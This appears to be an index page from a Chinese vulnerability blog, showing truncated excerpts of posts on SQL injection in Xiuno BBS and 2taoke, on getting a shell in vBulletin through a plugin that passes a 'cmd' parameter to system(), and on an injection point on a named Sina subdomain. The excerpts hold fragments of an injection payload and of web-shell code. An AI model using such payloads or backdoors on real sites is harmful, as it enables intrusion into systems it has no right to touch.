-
修罗(Xiuno 1.0.2) bbs 注入漏洞
前段时间爆出 Xiuno bbs 后台拿shell无意中翻了下代码发现 搜索型注入漏洞(POST)magic_quotes_gpc = Off获取用户个数' AND (SELECT 1600 FROM(SELECT COUNT(*),CON...
-
vBulletin 论坛后台拿shell
在后台,进插件管理.添加插件. Ajax_complete 填入代码:if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; syst...
-
sina某分站sql注射
简要描述:新浪某分站,对用户提交参数过滤不严格,导致注入漏洞详细说明: http://ikongzi.edu.sina.com/do/schools.php?f_id=8&a_id=2883http://ikongzi.edu.si...
-
80sec被黑
www.80sec.com被黑...
-
2taoke 2.2 注入漏洞
function tao_check($string){ if(!is_array($string)) return addslashes(trim($string));...
